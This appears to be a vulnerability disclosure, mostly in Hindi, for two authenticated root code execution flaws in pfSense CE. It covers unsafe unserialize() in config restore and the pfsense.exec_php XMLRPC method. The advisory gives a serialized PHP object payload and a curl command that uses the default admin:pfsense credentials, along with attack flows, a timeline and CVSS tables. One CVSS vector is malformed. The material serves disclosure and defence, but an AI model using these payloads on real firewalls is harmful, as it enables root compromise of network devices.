
Netgate pfSense CE 2.7.2 और 2.8.0 में प्रमाणित RCE
Netgate pfSense Community Edition में प्रमाणित रिमोट कोड निष्पादन
| क्षेत्र | विवरण |
|---|---|
| शोधकर्ता | Nelson Adhepeau (@privlabs) |
| विक्रेता | Netgate |
| उत्पाद | pfSense Community Edition |
| संस्करण | 2.7.2 और 2.8.0 |
| प्रकार | प्रमाणित रिमोट कोड निष्पादन |
| प्रकटीकरण | फ़रवरी 2026 |
| विक्रेता को सूचित किया गया | 2 दिसंबर, 2025 |
| CVE निर्दिष्ट | 28 जनवरी, 2026 |
यह शोध केवल शैक्षिक और सुरक्षा जागरूकता उद्देश्यों के लिए पृथक प्रयोगशाला वातावरण में किया गया था और सुरक्षा जागरूकता उद्देश्यों के लिए ही। सभी निष्कर्ष प्रकाशन से पूर्व विक्रेता को जिम्मेदारीपूर्वक सूचित किए गए थे। यह सलाह उत्पादन प्रणालियों पर हमला करने का निमंत्रण नहीं है। अनधिकृत परीक्षण अवैध है।
pfSense कॉन्फ़िगरेशन पुनर्स्थापना तंत्र उपयोगकर्ता-नियंत्रित डेटा पर unserialize() को
बिना क्लास व्हाइटलिस्टिंग, इनपुट सत्यापन, या सैंडबॉक्सिंग के आमंत्रित करता है।
एक दुर्भावनापूर्ण सीरियलाइज़्ड PHP ऑब्जेक्ट युक्त गढ़ा गया बैकअप फ़ाइल post_reboot_commands प्रॉपर्टी के माध्यम से मनमाने कमांड इंजेक्ट करता है, जिन्हें
mwexec() के माध्यम से पूर्ण रूट विशेषाधिकारों के साथ निष्पादित किया जाता है।
[Attacker] → Login as admin
→ Upload malicious .xml backup file
→ Trigger restore
→ pfSense calls unserialize() on attacker data
→ post_reboot_commands executed via mwexec()
→ [ROOT SHELL]
config.php — पुनर्स्थापना प्रसंस्करण तर्कpfsense_module_installer वर्ग — असुरक्षित डिसीरियलाइज़ेशन लक्ष्यmwexec() — कमांड निष्पादन सिंकO:23:"pfsense_module_installer":1:{
s:17:"*post_reboot_commands";
a:1:{
i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
}
}
"स्वीकृत। प्रमाणित प्रशासनिक दुरुपयोग के रूप में वर्गीकृत। कोई पैच जारी नहीं किया जाएगा।" — Netgate
pfSense CE 2.8.0 एक XMLRPC विधि pfsense.exec_php उजागर करता है जो
बिना सत्यापन, सैंडबॉक्सिंग, या किसी भी प्रकार के प्रतिबंध के रूट के रूप में मनमाना PHP कोड निष्पादित करता है।
एंडपॉइंट है:
admin:pfsense) के साथ शोषण योग्य[Attacker] → Send XMLRPC request to /xmlrpc.php
→ Authenticate with admin:pfsense (default)
→ Call pfsense.exec_php with arbitrary PHP
→ Code executes as root, no sandboxing
→ [ROOT SHELL]
xmlrpc.php — API प्रवेश बिंदुpfsense.exec_php — असुरक्षित गतिशील कोड निष्पादनcurl -k -u admin:pfsense \
-H "Content-Type: text/xml" \
-d '<methodCall>
<methodName>pfsense.exec_php</methodName>
<params>
<param>
<value><string>system("id");</string></value>
</param>
</params>
</methodCall>' \
https://<target>/xmlrpc.php
"स्वीकृत। प्रमाणित उपयोगकर्ताओं के लिए अपेक्षित व्यवहार के रूप में वर्गीकृत। कोई पैच की योजना नहीं है।" — Netgate
November 2025 → Vulnerabilities discovered
December 2, 2025 → Responsible disclosure to Netgate
→ Vendor acknowledged, no patch planned
January 28, 2026 → CVE IDs assigned by MITRE
February 2026 → Public disclosure
[email protected]Nelson Adhepeau — स्वतंत्र सुरक्षा शोधकर्ता
| क्षेत्र | मान |
|---|
| CVSS v3.1 | 8.8 (उच्च) |
| वेक्टर | AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-502, CWE-915 |
| हमले का प्रकार | प्रमाणित (व्यवस्थापक) |
| घटक | बैकअप/पुनर्स्थापना तंत्र |
| क्षेत्र | मान |
|---|
| CVSS v3.1 | 9.9 (गंभीर) |
| वेक्टर | AV:N/AC:L/PR:L/UI:N/S:C:C:H/I:H:A |
| CWE | CWE-284, CWE-915 |
| हमले का प्रकार | प्रमाणित (रिमोट, बेसिक प्रमाणीकरण) |
| घटक | XMLRPC API — pfsense.exec_php |